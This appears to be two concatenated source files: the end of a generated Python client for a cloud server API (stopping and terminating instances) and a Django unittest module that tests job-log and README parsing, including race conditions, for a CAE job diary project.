# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/stopServerInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StopServerInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def terminate_server_instances(self, terminate_server_instances_request, **kwargs): # noqa: E501
"""terminate_server_instances # noqa: E501
Terminate (return) server instances  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.terminate_server_instances(terminate_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param TerminateServerInstancesRequest terminate_server_instances_request: terminateServerInstancesRequest (required)
:return: TerminateServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.terminate_server_instances_with_http_info(terminate_server_instances_request, **kwargs) # noqa: E501
else:
(data) = self.terminate_server_instances_with_http_info(terminate_server_instances_request, **kwargs) # noqa: E501
return data
def terminate_server_instances_with_http_info(self, terminate_server_instances_request, **kwargs): # noqa: E501
"""terminate_server_instances # noqa: E501
Terminate (return) server instances  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.terminate_server_instances_with_http_info(terminate_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param TerminateServerInstancesRequest terminate_server_instances_request: terminateServerInstancesRequest (required)
:return: TerminateServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['terminate_server_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method terminate_server_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'terminate_server_instances_request' is set
if ('terminate_server_instances_request' not in params or
params['terminate_server_instances_request'] is None):
raise ValueError("Missing the required parameter `terminate_server_instances_request` when calling `terminate_server_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'terminate_server_instances_request' in params:
body_params = params['terminate_server_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/terminateServerInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TerminateServerInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
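# ---------------------------------------------------------------------------
# Usage sketch (not part of the generated client). A minimal example of how
# the methods above are typically driven; the package name, the api class
# name, and the instance number are assumptions based on NCP's generated SDK
# layout, not confirmed by this file:
#
# import ncloud_server                                     # hypothetical package name
# from ncloud_server.rest import ApiException              # hypothetical import path
#
# api = ncloud_server.V2Api(ncloud_server.ApiClient(ncloud_server.Configuration()))
# request = ncloud_server.TerminateServerInstancesRequest(
#     server_instance_no_list=['1234567'])                 # hypothetical instance no
# try:
#     response = api.terminate_server_instances(request)   # synchronous by default
#     print(response)
# except ApiException as e:
#     print("terminate_server_instances failed: %s" % e)
# ---------------------------------------------------------------------------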
tests/test_utils/test_jobinfo/test_poll.py | tbrlpld/CAEJobDiary | 16676b3eaa56aafdf54579d19baa6540375d91e4 | ["MIT"] | 53,476 bytes | 2 stars (2020-06-06T01:37:33Z to 2020-06-06T04:16:18Z)
"""
Module to unittest the functions of the `poll` module
"""
import logging
import logging.config
import os
import shutil
import tempfile
from datetime import datetime, timedelta
import before_after
from django.contrib.auth import get_user_model
from django.test import TestCase
import pytz
from diary.models import Job
from utils.caefileio.readme import get_job_info_from_readme
from utils.logger_copy import copy_logger_settings
from test_utils.helper import add_content_to_temp_inputfilepath
from test_utils.helper import make_readme
# Major Functions
from utils.jobinfo.poll import start_job_creation_process_from_joblogfile
# Helper Functions
from utils.jobinfo.poll import is_recent
from utils.jobinfo.poll import required_keys_avaiable
# -----------------------------------------------------------------------------
# Logging
# -----------------------------------------------------------------------------
logger = logging.getLogger("testing_control").getChild(__name__)
copy_logger_settings("testing_subject", "utils.jobinfo.poll")
# -----------------------------------------------------------------------------
# Check Environment
# -----------------------------------------------------------------------------
# On the CI (gitlab-runner) the defined jobs are run as root.
# root can always read all files, even if permissions are removed.
# Tests for missing permissions are needed though.
# Therefore, certain tests can not be asserted correctly in the CI environment.
# To exclude tests from assertion, I need to know if I am on the CI.
settings_module = os.environ['DJANGO_SETTINGS_MODULE']
running_on_ci = settings_module.endswith(".ci")
logger.info("Tests running on CI: {}".format(running_on_ci))
# -----------------------------------------------------------------------------
# Make `User` model available
# -----------------------------------------------------------------------------
User = get_user_model()
# -----------------------------------------------------------------------------
# Test Start Job Creation Process From Joblogfile
# -----------------------------------------------------------------------------
class TestStartJobCreationProcessFromJoblogfile(TestCase):
"""
Test the `start_job_creation_process_from_joblogfile` method of `poll`
"""
# -------------------------------------------------------------------------
def setUp(self):
self.user_A = User.objects.create(
username="usera", email="usera@example.com")
self.project_A = "3001234"
self.project_B = "3005678"
self.job_user_A_project_A = Job(
job_id=123,
user=self.user_A,
project=self.project_A,
main_name="some_main_title.key",
sub_dir="/some/not/existing/path",
job_status=Job.JOB_STATUS_PENDING
)
self.job_user_A_project_A.full_clean()
self.job_user_A_project_A.save()
self.job_user_A_project_B = Job(
job_id=456,
user=self.user_A,
project=self.project_B,
main_name="another_main_title.key",
sub_dir="/some/not/existing/path",
job_status=Job.JOB_STATUS_RUNNING
)
self.job_user_A_project_B.full_clean()
self.job_user_A_project_B.save()
self.free_id = 789
# -------------------------------------------------------------------------
def test_not_existing_joblogfile(self):
logger.info("-"*80)
logger.info("Test not existing joblogfile")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
joblogfile_path = "/this/should/not/exist/file.log"
self.assertFalse(os.path.exists(joblogfile_path))
job_created = start_job_creation_process_from_joblogfile(
joblogfile_path)
self.assertFalse(job_created)
# Number of jobs should not have changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_processing_of_joblogfile_with_empty_infos(self):
logger.info("-"*80)
logger.info("Test processing of joblogfile with empty infos")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
# Defining joblogfile content
joblogfile_content = """
job_number:
sge_o_workdir:
"""
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
job_created = start_processing_from_content(joblogfile_content)
self.assertFalse(job_created)
# Number of jobs should not have changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_pending_job_dir_is_file_not_dir(self):
"""
When the job_dir is a file, an error should be raised and logged
If the job_dir is actually a file, something went wrong while
determining what the job_dir is. In that case an error should be
raised and logged.
"""
logger.info("-"*80)
logger.info("Test processing when the pending 'job_dir' is a file not directory")
logger.info("-"*80)
with tempfile.TemporaryDirectory() as sub_dir:
job_id = self.free_id
job_dir_file = os.path.join(sub_dir, str(job_id) + ".pending")
open(job_dir_file, 'a').close()
logger.info("sub_dir content: {}".format(os.listdir(sub_dir)))
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
logger.info("joblogfile_content: {}".format(joblogfile_content))
with tempfile.NamedTemporaryFile(mode="w") as joblogfile:
joblogfile.write(joblogfile_content)
joblogfile.seek(0)
with self.assertLogs(logger="utils.jobinfo.poll",
level=logging.ERROR) as cm:
start_job_creation_process_from_joblogfile(joblogfile.name)
logger.info("Logs of required level: {}".format(cm.output))
# -------------------------------------------------------------------------
def test_processing_from_joblogfile_pending_job(self):
logger.info("-"*80)
logger.info("Test processing of pending job")
logger.info("-"*80)
job_id = self.free_id
with tempfile.TemporaryDirectory() as tempdir:
sub_dir = tempdir
# Make pending job folder
job_dir = os.path.join(tempdir, str(job_id) + ".pending")
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=self.user_A.username,
email=self.user_A.email,
base_runs_str=str(self.job_user_A_project_A.job_id),
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
start_processing_from_content(joblogfile_content)
# Assertions
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 3) # The setup ones and the new one
processed_job = Job.objects.get(job_id=job_id)
self.assertEqual(processed_job.job_id, job_id)
self.assertEqual(processed_job.sub_dir, sub_dir)
self.assertEqual(processed_job.job_status, Job.JOB_STATUS_PENDING)
self.assertEqual(processed_job.job_dir, job_dir)
self.assertEqual(processed_job.readme_filename, readme_filename)
self.assertEqual(processed_job.main_name, main_name)
self.assertEqual(processed_job.solver, "dyn")
tz = pytz.timezone("Europe/Berlin")
aware_datetime = tz.localize(datetime(2018, 6, 7, 17, 21, 21))
self.assertEqual(processed_job.sub_date, aware_datetime)
self.assertEqual(processed_job.info, "Some info text")
self.assertIn(self.job_user_A_project_A, processed_job.base_runs.all())
self.assertEqual(processed_job.user, self.user_A)
self.assertEqual(processed_job.user.username, self.user_A.username)
self.assertEqual(processed_job.user.email, self.user_A.email)
# -------------------------------------------------------------------------
def test_processing_from_joblogfile_running_job(self):
logger.info("-"*80)
logger.info("Test processing of running job")
logger.info("-"*80)
job_id = self.free_id
cluster_temp_dir = tempfile.TemporaryDirectory()
cluster_scratch_dir = os.path.join(cluster_temp_dir.name, str(job_id))
os.makedirs(cluster_scratch_dir)
logger.debug("Cluster scratch dir: {}".format(cluster_scratch_dir))
with tempfile.TemporaryDirectory() as tempdir:
sub_dir = tempdir
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Create cluster script
cluster_script_content = "cd {}*".format(cluster_scratch_dir)
logger.debug("Cluster script content: {}".format(cluster_script_content))
cluster_script_filename = "{}.dyn-dmp.x01xx012.16.sh".format(job_id)
cluster_script_filepath = os.path.join(sub_dir, cluster_script_filename)
with open(cluster_script_filepath, mode="w") as f:
f.write(cluster_script_content)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=cluster_scratch_dir,
job_id=job_id,
sub_dir=sub_dir,
username=self.user_A.username,
email=self.user_A.email,
base_runs_str=str(self.job_user_A_project_A.job_id),
main_name=main_name
)
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
start_processing_from_content(joblogfile_content)
# Cleaning up the cluster scratch dir / tempdir
cluster_temp_dir.cleanup()
# Assertions
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 3)
processed_job = Job.objects.get(job_id=job_id)
self.assertEqual(processed_job.job_id, job_id)
self.assertEqual(processed_job.sub_dir, sub_dir)
self.assertEqual(processed_job.job_status, Job.JOB_STATUS_RUNNING)
self.assertEqual(processed_job.job_dir, cluster_scratch_dir)
self.assertEqual(processed_job.readme_filename, readme_filename)
self.assertEqual(processed_job.main_name, main_name)
self.assertEqual(processed_job.solver, "dyn")
tz = pytz.timezone("Europe/Berlin")
aware_datetime = tz.localize(datetime(2018, 6, 7, 17, 21, 21))
self.assertEqual(processed_job.sub_date, aware_datetime)
self.assertEqual(processed_job.info, "Some info text")
self.assertIn(self.job_user_A_project_A, processed_job.base_runs.all())
self.assertEqual(processed_job.user, self.user_A)
self.assertEqual(processed_job.user.username, self.user_A.username)
self.assertEqual(processed_job.user.email, self.user_A.email)
# -------------------------------------------------------------------------
def test_processing_abort_due_to_duplication(self):
logger.info("-"*80)
logger.info("Test processing abort due to existing job in DB.")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
# Use job id of job already in the DB
job_id = self.job_user_A_project_A.job_id
with tempfile.TemporaryDirectory() as tempdir:
sub_dir = tempdir
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make pending job folder
job_dir = os.path.join(tempdir, str(job_id) + ".pending")
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=self.user_A.username,
email=self.user_A.email,
base_runs_str="",
main_name=main_name
)
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
return_value = start_processing_from_content(joblogfile_content)
self.assertFalse(return_value)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_no_read_access_to_finished_job(self):
if running_on_ci:
self.skipTest("root on CI can read files regardless of permissions")
logger.info("-"*80)
logger.info("Test processing with a not readable `job_dir`")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
job_id = self.free_id
with tempfile.TemporaryDirectory() as sub_dir:
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make job folder
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=self.user_A.username,
email=self.user_A.email,
base_runs_str="",
main_name=main_name
)
# Remove read rights on job_dir
os.chmod(job_dir, 0o222)
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
return_value = start_processing_from_content(joblogfile_content)
# Adding rights back for deletion
os.chmod(job_dir, 0o777)
self.assertFalse(return_value)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_no_read_access_to_finished_job_README(self):
if running_on_ci:
self.skipTest("root on CI can read files regardless of permissions")
logger.info("-"*80)
logger.info("Test processing with a not readable README")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
job_id = self.free_id
with tempfile.TemporaryDirectory() as sub_dir:
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make job folder
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username="doej",
email="john.doe@example.com",
base_runs_str="",
main_name=main_name
)
# Remove read rights on job_dir
os.chmod(readme_filepath, 0o222)
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
return_value = start_processing_from_content(joblogfile_content)
# Adding rights back for deletion
os.chmod(readme_filepath, 0o777)
self.assertFalse(return_value)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_not_all_required_keys_in_README(self):
logger.info("-"*80)
logger.info("Test processing with a README where username is missing")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
job_id = self.free_id
with tempfile.TemporaryDirectory() as sub_dir:
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make job folder
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
logger.debug("Making readme file...")
email = self.user_A.email
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_content = """
README for {main_name}
base-run (job-id):
information :
Some info text
********Header********
SOLVERVER: mpp.s.R9.1.0.113698.113698_dmp_sp
******Environment******
EMail: {email}
Sub-Date: 2018-06-07__17:21:21
Solver: dyn
SubDir: {sub_dir}
FILE: {main_name}
JOBID: {job_id}
""".format(
email=email,
sub_dir=sub_dir,
job_id=str(job_id),
main_name=main_name)
logger.debug(readme_content)
readme_filename = f"README.{main_name}.README"
readme_filepath = os.path.join(job_dir, readme_filename)
with open(readme_filepath, mode="w") as f:
f.write(readme_content)
# Make sure the readme is indeed missing some required keys
self.assertFalse(
required_keys_avaiable(
get_job_info_from_readme(readme_filepath)))
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
with self.assertLogs(logger="utils.jobinfo.poll",
level=logging.ERROR) as cm:
job_created = start_processing_from_content(joblogfile_content)
logger.info("Logs of required level: {}".format(cm.output))
self.assertFalse(job_created)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_empty_README(self):
logger.info("-"*80)
logger.info("Test processing with an empty README")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
job_id = self.free_id
with tempfile.TemporaryDirectory() as sub_dir:
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make job folder
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
logger.debug("Making readme file...")
email=self.user_A.email
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_content=""
readme_filename = f"README.{main_name}.README"
readme_filepath = os.path.join(job_dir, readme_filename)
with open(readme_filepath, mode="w") as f:
f.write(readme_content)
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
with self.assertLogs(logger="utils.jobinfo.poll",
level=logging.ERROR) as cm:
job_created = start_processing_from_content(joblogfile_content)
logger.info("Logs of required level: {}".format(cm.output))
self.assertFalse(job_created)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_no_README_in_job_dir(self):
logger.info("-"*80)
logger.info("Test processing without a README in the job_dir")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
job_id = self.free_id
with tempfile.TemporaryDirectory() as sub_dir:
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make job folder
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
with self.assertLogs(logger="utils.jobinfo.poll",
level=logging.WARNING) as cm:
job_created = start_processing_from_content(joblogfile_content)
logger.info("Logs of required level: {}".format(cm.output))
self.assertFalse(job_created)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_job_file_not_folder(self):
logger.info("-"*80)
logger.info(
"Test processing with the `job_dir` being a file not a directory")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
job_id = self.free_id
with tempfile.TemporaryDirectory() as sub_dir:
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make job file (not folder)
job_dir = os.path.join(sub_dir, str(job_id))
open(job_dir, "w").close()
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
with self.assertLogs(logger="utils.jobinfo.poll",
level=logging.ERROR) as cm:
job_created = start_processing_from_content(joblogfile_content)
logger.info("Logs of required level: {}".format(cm.output))
self.assertFalse(job_created)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
class TestRaceConditionInProcessing(TestCase):
"""
Test race conditions in the `start_job_creation_process_from_joblogfile` method of `poll`
"""
# -------------------------------------------------------------------------
def test_racecondition_running_job_finishes_before_getting_readme_filename(self):
logger.info("-"*80)
logger.info("Test processing with running job that finishes during processing")
logger.info("Job finishes before README filename is determined in job_dir")
logger.info("-"*80)
def finish_running_job(*a, **kw):
"""
Move content of cluster scratch dir to job_dir in sub_dir
The cluster scratch dir is removed. This simulates the SGE process
when a job finishes.
"""
logger.info("Job finished ***********")
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Copy files
for file in os.listdir(cluster_scratch_dir):
filepath = os.path.join(cluster_scratch_dir, file)
shutil.copy(filepath, job_dir)
# Remove cluster scratch dir
shutil.rmtree(cluster_scratch_dir)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
cluster_temp_dir = tempfile.TemporaryDirectory()
cluster_scratch_dir = os.path.join(cluster_temp_dir.name, str(job_id))
os.makedirs(cluster_scratch_dir)
logger.debug("Cluster scratch dir: {}".format(cluster_scratch_dir))
with tempfile.TemporaryDirectory() as tempdir:
sub_dir = tempdir
# Create cluster script
cluster_script_content = "cd {}*".format(cluster_scratch_dir)
logger.debug("Cluster script content: {}".format(cluster_script_content))
cluster_script_filename = "{}.dyn-dmp.l01cl012.16.sh".format(job_id)
cluster_script_filepath = os.path.join(sub_dir, cluster_script_filename)
with open(cluster_script_filepath, mode="w") as f:
f.write(cluster_script_content)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=cluster_scratch_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_readme_filename_from_job_dir",
finish_running_job):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
start_processing_from_content(joblogfile_content)
# Cleaning up the cluster scratch dir / tempdir
cluster_temp_dir.cleanup()
# Assertions
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 1) # only the created one
processed_job = Job.objects.get(job_id=job_id)
self.assertEqual(processed_job.job_status, Job.JOB_STATUS_FINISHED)
# -------------------------------------------------------------------------
def test_racecondition_running_job_finishes_before_getting_readme_info(self):
logger.info("-"*80)
logger.info("Test processing with running job that finishes during processing")
logger.info("Job finishes before info is retrieved from README")
logger.info("-"*80)
def finish_running_job(*a, **kw):
"""
Move content of cluster scratch dir to job_dir in sub_dir
The cluster scratch dir is removed. This simulates the SGE process
when a job finishes.
"""
logger.info("Job finished ***********")
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Copy files
for file in os.listdir(cluster_scratch_dir):
filepath = os.path.join(cluster_scratch_dir, file)
shutil.copy(filepath, job_dir)
# Remove cluster scratch dir
shutil.rmtree(cluster_scratch_dir)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
cluster_temp_dir = tempfile.TemporaryDirectory()
cluster_scratch_dir = os.path.join(cluster_temp_dir.name, str(job_id))
os.makedirs(cluster_scratch_dir)
logger.debug("Cluster scratch dir: {}".format(cluster_scratch_dir))
with tempfile.TemporaryDirectory() as tempdir:
sub_dir = tempdir
# Create cluster script
cluster_script_content = "cd {}*".format(cluster_scratch_dir)
logger.debug("Cluster script content: {}".format(cluster_script_content))
cluster_script_filename = "{}.dyn-dmp.l01cl012.16.sh".format(job_id)
cluster_script_filepath = os.path.join(sub_dir, cluster_script_filename)
with open(cluster_script_filepath, mode="w") as f:
f.write(cluster_script_content)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=cluster_scratch_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_job_info_from_readme",
finish_running_job):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
start_processing_from_content(joblogfile_content)
# Cleaning up the cluster scratch dir / tempdir
cluster_temp_dir.cleanup()
# Assertions
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 1) # only the created one
processed_job = Job.objects.get(job_id=job_id)
self.assertEqual(processed_job.job_status, Job.JOB_STATUS_FINISHED)
# -------------------------------------------------------------------------
def test_racecondition_pending_job_deleted_before_getting_readme_filename(self):
logger.info("-"*80)
logger.info("Test processing with job_dir (pending) is deleted after status is determined")
logger.info("-"*80)
def delete_job_dir(*a, **kw):
"""
Delete job_dir
"""
logger.info("Job folder is deleted ***********")
# Remove cluster scratch dir
shutil.rmtree(job_dir)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
with tempfile.TemporaryDirectory() as sub_dir:
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id) + ".pending")
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_readme_filename_from_job_dir",
delete_job_dir):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
job_created = start_processing_from_content(joblogfile_content)
# Assertions
self.assertFalse(job_created)
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 0)
# -------------------------------------------------------------------------
def test_racecondition_running_job_deleted_before_getting_readme_filename(self):
logger.info("-"*80)
logger.info("Test processing with job_dir (running) is deleted after status is determined")
logger.info("-"*80)
def delete_cluster_job_dir(*a, **kw):
"""
Delete job_dir in cluster scratch dir
"""
logger.info("Job folder is deleted ***********")
# Remove cluster scratch dir
shutil.rmtree(cluster_scratch_dir)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
cluster_temp_dir = tempfile.TemporaryDirectory()
cluster_scratch_dir = os.path.join(cluster_temp_dir.name, str(job_id))
os.makedirs(cluster_scratch_dir)
logger.debug("Cluster scratch dir: {}".format(cluster_scratch_dir))
with tempfile.TemporaryDirectory() as tempdir:
sub_dir = tempdir
# Create cluster script
cluster_script_content = "cd {}*".format(cluster_scratch_dir)
logger.debug("Cluster script content: {}".format(cluster_script_content))
cluster_script_filename = "{}.dyn-dmp.l01cl012.16.sh".format(job_id)
cluster_script_filepath = os.path.join(sub_dir, cluster_script_filename)
with open(cluster_script_filepath, mode="w") as f:
f.write(cluster_script_content)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=cluster_scratch_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_readme_filename_from_job_dir",
delete_cluster_job_dir):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
job_created = start_processing_from_content(joblogfile_content)
cluster_temp_dir.cleanup()
# Assertions
self.assertFalse(job_created)
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 0)
# -------------------------------------------------------------------------
def test_racecondition_finished_job_deleted_before_getting_readme_filename(self):
logger.info("-"*80)
logger.info("Test processing with job_dir (finished) is deleted after status is determined")
logger.info("-"*80)
def delete_job_dir(*a, **kw):
"""
Delete job_dir
"""
logger.info("Job folder is deleted ***********")
# Remove cluster scratch dir
shutil.rmtree(job_dir)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
with tempfile.TemporaryDirectory() as sub_dir:
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
